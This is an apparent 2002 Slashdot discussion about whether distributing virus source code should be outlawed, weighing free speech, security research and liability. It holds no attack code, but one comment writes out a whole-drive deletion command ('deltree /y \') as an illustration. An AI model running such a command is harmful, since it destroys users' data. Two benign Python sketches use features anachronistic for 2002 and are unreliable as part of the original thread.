Should Virus Distribution be Illegal?

mccormi writes "In a guest editorial on Newarchitect, Sarah Gordon looks at whether posting malicious code should be allowed and what steps could be taken to stop it. What's worrisome, though, is that restrictions on malicious code don't take into account who it's malicious against and what truly defines malicious." Note that she's not talking about actually infecting computers, but merely making the code available for others to examine (and for some of them, no doubt, to try to spread in the wild).
  • by NeoSkandranon ( 515696 ) on Friday April 12, 2002 @02:42PM (#3331172)
    Unless the law specified distribution of *machine readable* malicious code (i.e. binaries), MS et al. could start nailing those who post proof-of-concept code to demonstrate the flavor-of-the-week exploit in IIS or WinXP or what have you...more security by obscurity, yippee.
    • MS et al. could start nailing those who post proof-of-concept code

      It will be a while before MS et al. have the authority to enforce laws. The best they can do is press charges.

      • To: Good Citizen posing as an evil hacker by exposing our own stupidity
        From: The Law Offices of Bend, Over, and Takeit.

        Dear Sir:

        You have recently referred to a website that had discussed the possibility of posting conceptual code that exposes an embarrassing hole in our client's poorly constructed software.

        To wit, this is notice that we are suing you for millions of dollars pending your decision to withdraw your comments and acknowledge Bill Gates as lord of the universe.

        You have until the end of this sentence to comply.
    • This sets a dangerous precedent.

      Once the distribution / posting of software deemed "malicious" is outlawed, it becomes only a matter of time before someone attempts to apply the law to security tools such as nmap, ethereal, and any/all proof-of-concept exploits.

      The distribution of "malicious" code should be regulated (or intentionally unregulated) much the same as file sharing should be: posting things for others should be legal; using things for illegal and malicious acts should not.

      The problem, though, is the impossibility of catching everyone who uses a "malicious program" once it has been posted. Much like peer-to-peer file sharing, once something is online, it is difficult or impossible to contain. Hence a paradox: legislators correctly see that the only way to truly stop these nuisances is to stop them at the source, the single point of failure; unfortunately, doing so seems to trample on fair use and free speech principles.

      I, unfortunately, see no easy solution to this problem.
    • Unless the law specified distribution of *machine readable* malicious code (i.e. binaries)

      Even better, I could write a compiler that takes the US Constitution as "source" and compiles it into a virus-like binary, and TADA, the Constitution is illegal to distribute!
      • by cybermage ( 112274 ) on Friday April 12, 2002 @03:47PM (#3331597) Homepage Journal
        the Constitution is illegal to distribute!

        And you think the People in Charge (tm) have a problem with that?

        Did you know that there is a company in Texas (I've forgotten their name) that has the copyright on a Standardized Municipal Code in use across the US and that they don't allow licensees (i.e., cities) to publish it. In many places, if you want to read your city's laws, you need to pay for a license or go down to city hall and read their copy. I swear I'm not making this up.

        Ignorance of the law is no excuse. That'll be $20 for your copy.
      • the Constitution is illegal to distribute!

        The constitution, the idea of rule by law, Christianity, Buddhism, open source... are all viruses of the mind. The US founding fathers distributed the Declaration of Independence around with the express malicious intent of throwing the Brits out on their arses.

        Come to think of it, the anti-virus law itself is a piece of logic a lawyer designed and executed in the court system with the intent of getting back at the people who made their computer crash.
    • by ebyrob ( 165903 ) on Friday April 12, 2002 @03:39PM (#3331555)
      "In a guest editorial on Newarchitect, Sarah Gordon looks at whether criticizing large corporations for their mistakes and shoddy products should be allowed and what steps could be taken to stop it. What's worrisome though is that restrictions on criticism don't take into account who it's against and what truly defines criticism." Note that she's not talking about actually infecting computers, but merely making the criticism available for others to examine (and for some of them, no doubt, to use as a tool for damaging corporate profits).

      From the article:
      It's true that the scientific community encourages research, but only when it's conducted within the ethical boundaries of a given discipline.

      So let me get this straight... It's ethical to create software that has tons of security exploits and spies on unsuspecting users who purchase it, but it's unethical to give people the tools they need to test their systems for vulnerabilities and guarantee security for their own peace of mind. It might be OK to give such tools to large corporations, but private individuals just shouldn't need that kind of privacy...
  • Hmm. (Score:4, Funny)

    by Renraku ( 518261 ) on Friday April 12, 2002 @02:42PM (#3331174) Homepage
    I think it should be illegal to write and release viruses. Viruses should follow all standard software rules, which means, the maker could easily be sued for damages. And no, sending the virus with a EULA wouldn't protect the maker legally.
    • Re:Hmm. (Score:3, Insightful)

      by 56ker ( 566853 )
      What along the lines of

      If this virus causes you problems with your computer the author cannot be held legally responsible.

      Do you agree [Y/Yes]?
    • Re:Hmm. (Score:5, Interesting)

      by Slynkie ( 18861 ) <jsalit@NospAM.slunk.net> on Friday April 12, 2002 @02:57PM (#3331270) Homepage
      Ugh.

      Code is -art-.

      When I was but a wee hacker, I used to LOVE reading virus source code. I would download all I could find (granted, at the time, it was from BBSes, or sneaker-net), and let me tell ya, I learned much more from those viruses than I ever learned in any mainstream assembler class I've taken.

      And no, I -never- used the code for malicious purposes. It was just amazingly interesting to me.

      To make it illegal to write ANY type of code is just insane; and if you distribute it without disguising it as something else, what's the real problem??
      • Code is -art-.

        Garbage is art. Landscapes are art. Campbell's soup cans are art. A broken stereo is art.

        My point is, anything can be art. That doesn't mean it MUST be allowed to be distributed.

        We're not talking about a film that portrays graphic violence, or erotic art, which may or may not "corrupt" children. Viruses directly do damage, and that's the difference.

        While we shouldn't go on a witch hunt to end virus code distribution, you can't just say "art" and make it untouchable.

        mark
        • Re:Hmm. (Score:3, Insightful)

          by Slynkie ( 18861 )
          Heh, that made me imagine some little 1337 H4X0R kid running around stabbing people with pieces of trash or empty soup cans.

          Anyways, my intent was not to end the discussion by simply calling it "art". My point was, there -are- some reasons that distribution of virus code (note, I -do- say code and not executables) should not be made illegal, beyond the problem of "what constitutes malicious code" and "free speech". Virus code is -interesting-.

          Beyond that though, I think this is very similar to the Anarchist's Cookbook argument...should writings detailing how to make bombs and other harmful objects be illegal to distribute? I certainly don't think so; it's way too much loss of freedom for an indeterminable amount of safety in my book. And we're possibly talking real, physical harm to real people with that.
            Beyond that though, I think this is very similar to the Anarchist's Cookbook argument...should writings detailing how to make bombs and other harmful objects be illegal to distribute? I certainly don't think so; it's way too much loss of freedom for an indeterminable amount of safety in my book. And we're possibly talking real, physical harm to real people with that.

            That's a good point, definitely, but I think it's still worse with computer viruses. The anarchist's cookbook is right on the line, and I'm not sure exactly where I stand on that. But I think there is still a difference, in that the book describes how to do these bad things, and the virus actually does these bad things.

            I don't doubt that virus code is interesting, and things can be learned from it. I could even see the actual propagation of a virus as an artistic expression (like a "happening"). But there are sometimes things that are very interesting or cool that are still illegal, and being interesting or art is not enough reason by itself to allow them to be spread around.

            Maybe being a little too forgiving is better than making too much illegal, I don't know. It's definitely not a cut-and-dried thing. But I think it's a good approach to look at it similarly to bio-viruses.

            mark.
    • Re:Hmm. (Score:4, Insightful)

      by dasmegabyte ( 267018 ) <das@OHNOWHATSTHISdasmegabyte.org> on Friday April 12, 2002 @03:24PM (#3331457) Homepage Journal
      Really? Well, I got this virus the other night that was intentionally installed along with KaZaa. The virus watches every packet I send across the Internet and reports it back to the hackers that control it.

      Some people call it "ad ware" or "annoyance ware," but since I didn't want it, it reduces the effectiveness of my PC, and I wasn't alerted to its presence, I consider it a virus.

      Can I sue the manufacturers for damages?
    • Re:Hmm. (Score:3, Insightful)

      by Restil ( 31903 )
      I know this was written somewhat in jest, but should the creator of the rm command be held liable because someone got careless with the -rf option?

      Some programs by design can, if used improperly, cause a great deal of damage. Certainly, someone using a program to delete files can't exactly claim ignorance if the program actually DELETES the files they told it to.

      So what if I download a program, and the EULA specifically warns me that running the program will spread itself to 100 people and promptly wipe all accessible hard drives? That's what the program was SUPPOSED to do, and it specifically stated that in a document that by default almost nobody reads.

      Outlook, or any email program for that matter, has features that allow you to forward messages to other people. So when someone receives a message and an executable attachment is automatically run (because the email program allows that function), and a message pops up explaining that the user's computer "will now send 100 copies of the current message to anyone/everyone it can find, then wipe the disk, press OK to continue"... and the idiot user presses OK without ever reading the message, who's to blame here?

      Yes, it's a virus (or a worm if you will). Yes, its intent is malicious. But the user gave permission to execute it, just as if the user gave permission to erase his computer by using deltree /y \ instead.

      What's truly sad here is that a virus based on the previous model would probably spread just as well as your typical covert variety.

      -Restil
  • is spyware viral? (Score:3, Interesting)

    by hobbitsage ( 178961 ) on Friday April 12, 2002 @02:43PM (#3331177)
    Would spyware be included in the categorization? It could be argued that it is viral in intent if not propagation.
    • spyware is not malicious, although I'm not sure the same thing can be said about its creators ...
    • Hm? You're using the term 'viral' pretty broadly there, since propagation is a major part of the definition...

      OTOH, it would be interesting if somebody managed to go after spyware on the basis that the user didn't explicitly authorize such behavior. However, that's a huge can of worms, because computer programs are so incredibly complicated that one could split hairs ad infinitum (e.g. "Please authorize the program to write saved game files. Please authorize it to read the disk to load files. Please authorize this registry key. Please authorize me to receive keystrokes." et al), much akin to the nastiness between MSFT and the gov't regarding what exactly constitutes a core part of an operating system -- that is, where the boundaries are.

      Perhaps specific legislation regarding the not-explicitly-authorized monitoring of a user's behavior outside of the program would help -- recording keystrokes clearly fed to the program would be fine, but poking around in what the user does with other programs wouldn't be. That would be an incomplete approach, but it might be better than the present situation.
  • Well... (Score:5, Insightful)

    by IronTek ( 153138 ) on Friday April 12, 2002 @02:43PM (#3331179)
    Though no one likes to get a virus, and I often wonder who writes them and for what reasons, I do believe that there is probably much information to be gained from their examination as far as system function goes. From a learning standpoint, those who write them, while having too much free time on their hands, are learning some hard-core programming concepts, as are those who fight them. For the casual programmer, taking a peek at their code every now and then can actually be beneficial. But, as always, it's the person that can make good code cause bad things and vice versa. As always, it comes down to the person, not the code. The code itself should not be illegal. Knowledge cannot be locked up, and if it is, it can break free in a dangerous way. Better to have it out in the open where the "good guys" can combat it if need be, and everyone can learn from it.
    • It is painful for me to hear people continue to attempt to defend this position.

      The stance that it is somehow ideologically immoral to put constraints on the availability of dangerous information in our current society is not only without a rational defense, but also completely ignores the reality that such information can directly lead to a massive amount of harm.

      The problem with allowing all information to be free, under the premise that any bad result of its use is the fault of the person using it, is that modern society's infrastructure is rapidly tending toward a state where information can lead directly to action.

      Imagine, for instance, that you are an expert engineer who was magically transported to a pre-civilized era. Would the vast body of knowledge that you possessed help you, in that era, take actions that effect any significant amount of change? Would you, in fact, be able to do anything with the advanced information that you possess in such a situation?

      In earlier times, it was entirely OK to spread any and all information, because the worst that the information could do would be to change somebody's opinion on a political matter or teach somebody how to make a shoddy weapon (read: a stick) of minor consequence. In the near future, one will be able to transmit a digital specification for a weapon to be fabricated on one's personal fab-lab. The person won't require any knowledge of the specification or even of how a computer or fabrication machine works -- they will just have to buy the machine at Home Depot, download a spec for their weapon of choice from a web site, and possess the insanity to want to use the thing against society.

      I think it's entirely all-too clear that such demented individuals exist. What has kept the world safe thus far has been a lack of easily-available information (you must still be a geek to find computer cracking scripts), and a relatively weak amount of computer-based power (personal fab-labs are really expensive, and not very powerful).

      But this won't be the case in the future. We've already seen many technologies help your average Joe break the law at the click of his mouse by employing a highly refined and easy-to-use user interface -- just take a look at Napster and its clones. Clearly the very availability of Napster enabled thousands and millions to break laws that they would not have broken previously. The only difference between a Napster and a Code-Red virus is that Napster allowed one to violate a law in a way that is only arguably detrimental to society. It won't be long until these products allow your everyday Joe Bin Laden to inflict *serious* damage to society at his whim.

      It'd be great if information could always be free, but unless we restrict dangerous forms of it, we are simply giving up our safe way of life. Although one might *want* to give arbitrary individuals access to all information, you're essentially allowing arbitrary individuals the power to do anything they desire. This system will eventually lead to catastrophe, because you cannot make the entire world's population obey an honor system.
      • Because it's difficult or impossible to define what exactly is "dangerous" speech. In fact, as soon as you start outlawing speech because it's "dangerous" rather than actually harmful (and even that is hard to define), you quickly get into definitions of "dangerous" that include "works against the status quo".

        For example, look at Napster - I dispute your argument that people wouldn't have broken those copyright laws anyway - how many people make copies of tapes for their friends? It's simply that Napster allowed it on a SCALE that hadn't been seen before. And I'm somewhat of the opinion that if the majority of people, when given the opportunity to break a law, would do so, then we need to re-think the law. Especially when the result of breaking the law causes no direct harm to anyone.

        However, rather than considering that we might want to re-think copyright law into something more compatible with modern technology, they instead simply drop even heavier bombs and try to legislate it out of existence.

        This attitude toward speech is like the Victorian attitude toward sex - if you keep it in the dark where nobody can see it, we can all pretend it doesn't exist - but it still does. Keeping it in the open means that everyone knows it's there, and we can all talk about it. Yes, some people will abuse it - but I'd rather get hit by something I know about and can prepare for, than something which is kept secret and underground and that I don't even know about.

      • It is painful for me to hear people say that "a point of view is dangerous."

        First, we already have a lot of readily-available "dangerous" information, such as how to make napalm, pipe bombs, or homemade poisons. We have since before the advent of the internet. And I mean before 1969, not 1993. The information about how to kill one or several people is not hard to find, and never has been.

        Second, cracking and counter-cracking technologies are running an arms race, where exploits run a smaller chance of causing damage as time goes by. Some of the counter-cracking measures may advance because of altruism, but they are significantly hastened when a proof-of-concept demonstration is released to "arbitrary" parties (i.e., security-minded software consumers--the general public). They cannot afford the perception of sitting still while their security measures are overtaken.

        This is why your time-travel argument makes no sense, because you are deliberately speculating about an impossible scenario, one that does not exist in the world today or in a foreseeable future, and using it as a basis to restrict basic freedoms. Who's being dangerous now?

      • by Jerf ( 17166 ) on Friday April 12, 2002 @04:34PM (#3331962) Journal
        Without going into a point-by-point rebuttal, of course "that point of view is extremely dangerous". And of course much of what you said is plausible, inasmuch as wacked-out examples made for the purpose of outrage and extremism are plausible. (That's not sarcasm; it's a common rhetorical device that is seriously overused and abused, but it's still somewhat valid when understood correctly.)

        But you provide no evidence that, of the two alternatives, yours is better. Your scenarios are for the most part equally applicable to the hiding case; instead of information spreading openly, it spreads covertly. That doesn't change much. You can't keep information from a determined person; people are just too smart.

        I'd say that the post you are replying to is much better constructed as an argument, because it says why the alternative is better: The good guys can find it and learn from it. How is your proposal better? The bad guys still find it*. Now maybe the good guys don't. The "demented person" scenarios remain.

        Step up a meta level. You're focusing too tightly on a small part of the problem, and missing the global implications.

        I say that both revealing and hiding the information is dangerous. The danger comes from people, and therefore cannot be removed from the equation. (This is what you implicitly try to do, by hiding the information. The problem is, the information is not the danger.) But of the two alternatives, open discussion is clearly the preferable choice, both in theory, and in practice.

        (*: Proof: Look at the real world. Happens all the time. This is undeniable.)
      • It'd be great if information could always be free, but unless we restrict dangerous forms of it, we are simply giving up our safe way of life. Although one might *want* to give arbitrary individuals access to all information, you're essentially allowing arbitrary individuals the power to do anything they desire. This system will eventually lead to catastrophe, because you cannot make the entire world's population obey an honor system.


        The biggest problem with this line of thinking is that without the research being done on this stuff, there's no way to develop defenses. Someone is going to develop it eventually, and without the necessary defenses then everybody will be vulnerable. It's like you said, "because you cannot make the entire world's population obey an honor system."
    • Re:Well... (Score:2, Funny)

      by WMNelis ( 112548 )
      Code doesn't kill, people do!
    • ...then only outlaws will have viruses.
  • Of course not (Score:3, Insightful)

    by jvbunte ( 177128 ) on Friday April 12, 2002 @02:44PM (#3331190) Journal
    How is posting potentially harmful virus code any different than posting OS vulnerabilities and exploits? If this were to become law, how long would it take a certain OS manufacturer to extrapolate that same concept to cover all 'malicious' code fragments that could be used to target their OS?

    I don't like people who write viruses, and I like getting them even less; however, censoring the ability to post/review them is just another step down the slippery slope toward censorship of other things.
    • I don't like people who write viruses
      Do you mean that, or do you mean "I don't like people who distribute viruses to the general public without their specific knowledge"?

      There are good reasons for writing viruses, such as proof of concept.
    • Furthermore, if distributing harmful code in nonexecutable form for the purpose of study and discussion is wrong, wouldn't it be far, far worse to distribute harmful binaries that cause loss of data, as Word and Excel often do?
  • Of course, the perfect virus in this case would be one that

    • emails itself to everyone in your MS address book, and
    • then posts its own details under your name to a web site somewhere.

    Suddenly everyone who has ever been infected becomes a criminal for posting the virus's replication mechanism!

  • by Demon-Xanth ( 100910 ) on Friday April 12, 2002 @02:46PM (#3331202)
    The DMCA had the intention of eliminating piracy; however, it ended up being used to fight battles that never should have been fought. If MS releases an OS with a known backdoor, does that count as malicious? If someone makes a program that utilizes this backdoor in a way that MS did not intend (whether in a good way or a bad way), can MS claim this as malicious? Would NTFSDOS be considered malicious since it bypasses NTFS's protection?

    This is one of those issues where a law cannot be both effective and fair. And possibly not either.
  • If you're using malicious code for analysis so it can be defused, yes.


    The more known the code becomes, the easier it is to counter it.


    It also separates the wheat from the chaff in terms of IT employees. Whoever keeps up is a valuable resource in a sea of lax workers

  • by Dephex Twin ( 416238 ) on Friday April 12, 2002 @02:48PM (#3331218) Homepage
    I like the idea of thinking about biological and computer viruses in the same way.

    Researching biological viruses is legal, although people could attempt to spread said viruses maliciously. Those who deal with lethal viruses and diseases often can't just make samples and research easily accessible to anyone, even anonymous people. Why should virus "researchers" be able to do what is essentially the same thing?

    Free speech is good, research is good... but so are ethics and responsibility.

    mark
    • ..but the tools to create biological viruses are not (generally speaking) available to my next-door neighbour's 14-year-old. So I'm not as interested in being aware of the nitty-gritty details of potential biological threats.

      Viruses, however, enjoy a freedom in the form of $0 in startup costs. Yes, it makes the posted code all that much more likely to be exploited, but it also means I'm at more risk of casually being infected at any point in time by anybody, regardless of their access to biological and chemical lab equipment.

      Which is why I'd rather be aware of the nitty-gritty details myself, so I can take appropriate action, such as not running the software or patching it myself, depending on the severity of the exploit and the real-world triviality of its implementation and propagation. I've always felt that the bad will __always__ happen, and the worst you can do is keep the good guys in the dark.
      • The whole point is that the good guys are really the ones who *would* have legal access to this stuff.

        Maybe you can download viruses, examine them, and then better protect yourself as a result, but you should realize that you are not part of the 99.999999% who don't have the knowledge, time, or desire to study virus code in order to "protect" themselves. So Joe average-computer-victim is getting nothing out of it being available.

        I feel fine letting Symantec et al worry about studying viruses. I don't think we need to keep virus code distribution legal so that the few "freelance" virus-stopper folk can do the equivalent of chasing trespassers off their property with a shotgun. It isn't a good enough reason. If you really want to actively stop viruses by examining them, maybe you should take up that profession.

        mark
        • Of course, then we have to ask: how does one get considered part of the profession in the first place?

          Certification? Being an employee of a certified company? (Either of which, I'm sure, would be a good solution -- from Symantec's point of view.) Simply declaring oneself a virus researcher, which may be difficult if you don't have the background because you didn't have access before?
          • Of course, then we have to ask: how does one get considered part of the profession in the first place?

            Certainly that is an important consideration. I'm not sure of all the specifics of researching biological viruses, but I feel like the analogy could work for that as well. Bio-virus researchers have to get some sort of clearance, and computer virus researchers should have similar structure.

            Some guy couldn't suddenly declare himself a biological virus researcher, and it should be the same with computers, IMO.

            mark
        • by dillon_rinker ( 17944 ) on Friday April 12, 2002 @03:49PM (#3331612) Homepage
          I feel fine letting Symantec et al worry about studying viruses.
          I feel fine letting Sun worry about Java.
          I feel fine letting Microsoft worry about computer security.
          I feel fine letting the LAPD internal affairs department worry about police corruption.
          I feel fine letting the military worry about war.

          In general, I feel fine about letting the fox worry about the henhouse.
          • Ah yes, a "slippery slope" argument.

            What is with people today?

            My point was, at least I know who Symantec is, and can hold them accountable for things. No, I don't entrust my soul unto them, but I sure trust them more than Mr. AnonUser8000!

            mark
            • Your ability to make those judgments about trust, and to change them if circumstances warrant, is what's at stake here. What if those conspiracy theories about Symantec engineers writing viruses in order to promote their own products are true? You'd want to be able to re-evaluate who you trust, right?

              Here's something to keep in mind. You know how whenever an article comes up about unethical behavior by a corporation, someone always brings up the fiduciary responsibility thing? About how companies HAVE to make money, and they can be held liable if they don't do everything in their power to make money? Are you sure you want a company like that in charge of, well, anything? (Come to think of it, doesn't this mean if Symantec ISN'T driving sales of Norton AV by releasing viruses, they should be?)

            • MORON.

              The US has a "slippery slope" legal system.

              I don't care what your high school English teacher told you about rhetoric; when speaking of law, a "slippery slope" argument is perfectly acceptable. It reflects the way that the system ACTUALLY WORKS.

              ...and good luck TRYING to hold Symantec accountable.


    • Those who deal with lethal viruses and diseases often can't just make samples and research easily accessible to anyone, even anonymous people. Why should virus "researchers" be able to do what is essentially the same thing?


      The bar for experts working with dangerous biological agents is pretty high, and rightfully so. However, the bar for who can explore technology is considerably lower. This goes for information security issues as well.


      Who is to say who is the expert? Would you limit such research and tools to industry professionals?


      Despite the claims of some IT industry PR spin campaigns (and the apparent discomfort of some professionals), much of the state of Infosec tools and knowledge exists because of the work done by individuals outside traditional institutions.


    • I like the idea of thinking about biological and computer viruses in the same way.

      Sure. And I like the idea of thinking about pizza and manhole covers in the same way too. I mean, after all, they're roughly the same size, pretty much the same shape, and if you were to map out their distribution in the universe you'd find that they pretty much cluster around the same places. Why should I have to go to all the trouble of keeping them distinct in my head?

      The only problem is, when I start lumping things because of superficial similarities, I wind up making all sorts of wonky logic errors. So I have to be very careful to not be misled and to actually think about things, no matter how much easier it would be to grab a glib analogy and just run with it.

      -- MarkusQ

      • Sure. And I like the idea of thinking about pizza and manhole covers in the same way too. I mean, after all, they're roughly the same size, pretty much the same shape, and if you were to map out their distribution in the universe you'd find that they pretty much cluster around the same places. Why should I have to go to all the trouble of keeping them distinct in my head?

        Yes, why ever use analogies? Since we can easily make completely useless analogies, let's just forget them altogether!

        If you really think my analogy wasn't any good, why not support that with evidence having to do with viruses, instead of saying that analogies are wrong?

        Yes, one could theoretically lump things together inappropriately with analogies. I used an analogy, therefore I must have done that!

        Right.

        mark
  • Microsoft smiling...
    Lawyers call products "viral",
    Court can't get source code.
  • by dryueh ( 531302 ) on Friday April 12, 2002 @02:51PM (#3331236)
    Well... this issue raises some interesting, and very classic, ethical questions.

    Freedom of speech is protected, and rightly should be, but there are limitations to that freedom and even --gasp-- responsibilities. Writing code for viruses, or supplying it to the public, isn't bad in itself--it's the usage of it where the ethical complications come in. Thus, one could claim that simply posting the code for viruses is fine...the people to be blamed are the ones using that code for negligent purposes.

    The same could be true for yelling 'FIRE' in a crowded theatre, right? If an avalanche of trouble ensues, the fault must lie with those people who push over old ladies to get out of the theatre first, right? I mean, the person who yells fire may have played a role in facilitating all the chaos, but the actual causers of the injury are those running around...

    Of course, these two scenarios are completely different (the virus vs. yelling fire), but they raise similar points. Freedom of speech doesn't make you free from responsibility for your chosen speech...whether that's yelling 'Fire' or writing/supplying code for viruses...

    • This comes up a lot, and every time I think that shouting "FIRE" shouldn't be a problem if the theatre:
      • isn't full of highly flammable materials;
      • has adequate fire escapes.

      Likewise, writing a virus shouldn't be a problem if operating systems run untrusted code in a sandbox, and people don't propagate them carelessly.
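      Just to make the sandbox idea concrete, here's a minimal sketch in Python, assuming a POSIX system. The limits, the script path, and the helper names are all made up for illustration; this is nowhere near a real sandbox (no filesystem or network isolation), only the bare principle of running untrusted code under hard resource caps.

          import resource
          import subprocess

          def _apply_limits():
              # Runs in the child process just before exec: cap CPU seconds,
              # output file size, and process count so a runaway program
              # can't eat the whole machine. (POSIX only.)
              resource.setrlimit(resource.RLIMIT_CPU, (2, 2))
              resource.setrlimit(resource.RLIMIT_FSIZE, (1_000_000, 1_000_000))
              resource.setrlimit(resource.RLIMIT_NPROC, (50, 50))

          def run_untrusted(script_path):
              # Run the untrusted script in its own process, with the limits
              # above plus a hard wall-clock timeout.
              result = subprocess.run(
                  ["python3", script_path],
                  preexec_fn=_apply_limits,
                  capture_output=True,
                  timeout=10,
              )
              return result.returncode
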
  • The United States Constitution protects free speech, but virus writing and subsequent distribution aren't pure speech. Rather, they're speech plus action. The U.S. Supreme Court has recognized that speech and action, while closely intertwined, aren't one and the same. Thus, the act of putting virus code on the Internet isn't necessarily protected.

    I have to strongly disagree with this. Putting up information on the web that shows a person how to write a virus or a DoS bot or anything else is purely free speech, it's the free release of information. The action she's talking about here is the action of posting information, which is not malicious at all.

    To further illustrate her misguided logic by being absurd, let's apply this reasoning to other realms. By her logic, if you teach a person to use a gun, and that person takes that knowledge and shoots and kills someone, then you should go to prison for murder. Sorry, that doesn't fly. Just because you know how to write a virus and teach others how to write a virus, it's not illegal until you compile that source and make an effort to infect computer systems with that virus.

    Information, no matter what can be done with it, is never "good" or "bad" - it's what you do with that information, the actions you take, that are good or bad.

    Like it or not, even virus code should be protected under the First Amendment. However, for actually implementing and distributing a virus, there should be stiffer penalties.

    • By her logic, if you teach a person to use a gun, and that person takes that knowledge and shoots and kills someone, then you should go to prison for murder.

      No, that's wrong. If you teach someone to shoot a gun, and then they go and kill someone, it's true that you shouldn't be held responsible for that person's actions.

      Her point is something different. If you give a loaded handgun to someone and they run out the door and shoot someone, you're an accessory...right? There's a difference between supplying someone with knowledge versus supplying them with a weapon.

      So, if we teach someone how to program and they use that programming knowledge to write virus code, that's not our fault. However, if we give someone the code for a virus program and they simply release it into the mainstream, I don't think many people would dispute that we played a role in that destruction.

  • Sarah Gordon: Call it your constitutional right, but the truth is that it's morally wrong.

    It's our constitutional right, but it should be illegal?

  • by coyote-san ( 38515 ) on Friday April 12, 2002 @02:55PM (#3331258)
    Damn it, what part of "Freedom of Speech" do people not get?

    History has made it clear that the people pay dearly when free speech, esp. free speech regarding a matter of community security, is abridged. Not telling us that Acme locks are easily broken does not protect us from criminals -- only from the ones too dumb to figure it out for themselves -- and it serves mainly to give us a false sense of security.

    (As an aside, this is also the foundation of some of the most damning condemnations I've seen of "child protection" laws. As some judges have observed, the true obscenity is attempting to protect minors from all adult concerns until their 18th birthday... at which point they are thrown to the wolves with absolutely no preparation for the very real challenges adults must face.)

    A virus exchange site is similar. Yes, there will be some idiots (who deserve to have the full wrath of the law on them for their acts) who will use those viruses for ill will. But the same sites will also allow others to be warned that viruses against this specific software exist and are in the wild. No more Microsoft stonewalling about the existence of such attacks. No more trivializing them as highly specialized and not a concern to the average user.

    This is a bit scary... but that's part of being an adult. A child can go to bed at peace that the closet is empty of monsters, but part of being an adult is knowing that there are bad guys out there *and* that you've done everything you can to keep them away. I, for one, am getting damn tired of my self-appointed "betters" trying to infantilize me.
    • As strongly as I may disagree with Sarah Gordon's conclusions, I simply can't bring myself to brand her proposed methods as a violation of our "free speech" rights.

      She's not suggesting that laws be enacted to restrict the spread of educational virii. (Indeed, she says that most computer criminals are relatively unconcerned with the illegality of their acts.) Rather, she wants to make the distribution of them moral anathema. In her ideal world, posting ILoveYou source code to your site would be the equivalent of walking around a mall handing out Aryan Nation literature: legal but morally repugnant.

      Basically, Gordon wants to counter one form of free expression (educational virii) with another (public disgust). Yup -- free speech operating as intended.

      Do I agree with her opinions? Dear god, no. In fact, Gordon's idea to indoctrinate children from first-boot sounds eerily like the recent conservative push for teaching abstinence in schools. But she's got every right to try and advance her agenda through whatever constitutional means she has available to her.

  • by CMiYC ( 6473 ) on Friday April 12, 2002 @02:57PM (#3331272) Homepage
    Although not directly related to the article, I did get an idea. Some may say this is slightly off-topic, but we'll see. I've picked "test equipment" because I want a reputable source, meaning this scenario would be an honest accident.

    Okay so I write some code for a piece of test equipment. Let's just pick an example situation. I don't want to argue if this is a good or bad idea, but say I did it anyway. Every once in a while the machine checks to see if it is slipping its calibration. If it is, it contacts some server to say "hey look at me." Then the server responds and says "yeah I see you." Well with my expansive programming skills I accidentally code a bug. Let's say instead of contacting the intended target, I just start contacting anything I can find. Well another analyzer sees my cries for help and starts yelling too. See where I am going?

    The code was never intended to broadcast huge amounts of useless traffic. It happened by accident. I picked this haphazard example to be similar to Code Red. The machines are basically messaging, like mad, between each other. So does this mean my company or I should have charges (civil or criminal) brought against us? I say no, but I'm sure a lawyer would scream yes.
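    To make the accident scenario concrete, here's a hedged sketch (all names hypothetical, nothing from the article) of how the calibration "phone home" could be written so a bug can't turn it into a Code Red-style storm: the instrument only ever contacts one configured server and backs off exponentially on failure, instead of hunting for other listeners.

        import socket
        import time

        # Hypothetical fixed endpoint; the instrument never talks to anything else.
        CALIBRATION_SERVER = ("calibration.example.com", 9000)

        def report_drift(drift_ppm, max_attempts=5):
            # Send one small "I'm drifting" message, retrying with exponential
            # backoff. On repeated failure, give up quietly rather than
            # broadcasting to whatever else will listen.
            delay = 1.0
            for _ in range(max_attempts):
                try:
                    with socket.create_connection(CALIBRATION_SERVER, timeout=5) as sock:
                        sock.sendall(("DRIFT %.3f\n" % drift_ppm).encode())
                        return True
                except OSError:
                    time.sleep(delay)
                    delay *= 2
            return False
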
    • The "Oops, we didn't MEAN to do that" defense is not particularly strong in product liability cases if you're being accused of negligence. It may mean that the penalty is less than that of deliberate malfeasance (e.g. a potentially lethal safety defect in a car will probably result in a far greater penalty if the manufacturer decided that it was cheaper to settle lawsuits than to fix it), but it won't absolve you.
  • Symantec makes anti-virus software. The technical success of such software depends on information about viruses. The commercial success of such software depends on the vendor having information about viruses that other organizations or people do not have!

    If people can freely exchange information about viruses, they can also develop their own anti-virus solutions independently of the vendors of anti-virus software.

    One more point. I think it's easy for vendors of this software to slip into thinking that all such information is their intellectual property. In fact, they are probably not above writing and distributing viruses to stay in business, so that viruses may *in fact* be their IP; of course they would be against people reverse engineering their code in open discussion forums. Who knows; there may even be some inadvertent clue in there somehow revealing the origin of the virus, which would expose and ruin the virus/anti-virus developer.
    • The commercial success of such software depends on the vendor having information about viruses that other organizations or people do not have!

      An incorrect assumption. There is a "gentleman's agreement" between the vendors that requires that if a virus sample is submitted to one, the others get it too. The companies compete on technology, speed of response, quality of response, support, and any number of other things. But they don't hide virus samples from each other.

      In fact, they are probably not above writing and distributing viruses to stay in business

      Another canard. There are enough virus writers in the world to make this quite unnecessary. Most of the AV companies' response teams have enough work to do without some secret internal cabal of virus writers making more.

  • by bluGill ( 862 ) on Friday April 12, 2002 @03:01PM (#3331306)

    I can distribute instructions on how to turn a gun into a machine gun; that is legal.
    I can legally distribute instructions on how to make drugs.
    It is legal to distribute instructions on how to make bombs.
    I can join a club that intends to destroy the current government.
    I can legally plan a murder.

    In all of the above situations, following through and doing the act in question is illegal. However, knowing how to do it, and discussing it, is not. Once the act is carried out, though, not only is the act itself illegal, but planning and possessing the above turns from a legal act into conspiracy, which makes the whole thing a high crime.

    But we are not even talking about the above situations, where there is no legal reason to use that information. Instead we have:

    I can buy and use lockpicks.
    I can own and shoot a gun.
    I can own and use a car.
    I can drink alcohol.

    All of the above are legal and have legal uses. All can be used illegally.

    Likewise, there is benefit in distributing the source code for a virus. Programmers should study such things to understand how they work. Only through such understanding can we go the next step and write programs that prevent them from working. (This is an arms race; virus writers are getting better all the time, so we need to get better too.)

    • "I can join a club that intends to destroy the current government.
      I can legally plan a murder."

      I do agree with your point, but you need to back the truck up a bit. Both of the actions above fall under conspiracy: conspiracy to overthrow the government (which might be a shaky charge if you are just a member of the club but don't take part in any planning) and conspiracy to commit murder. The second one especially is no joke, and you WILL go to jail if caught doing it.
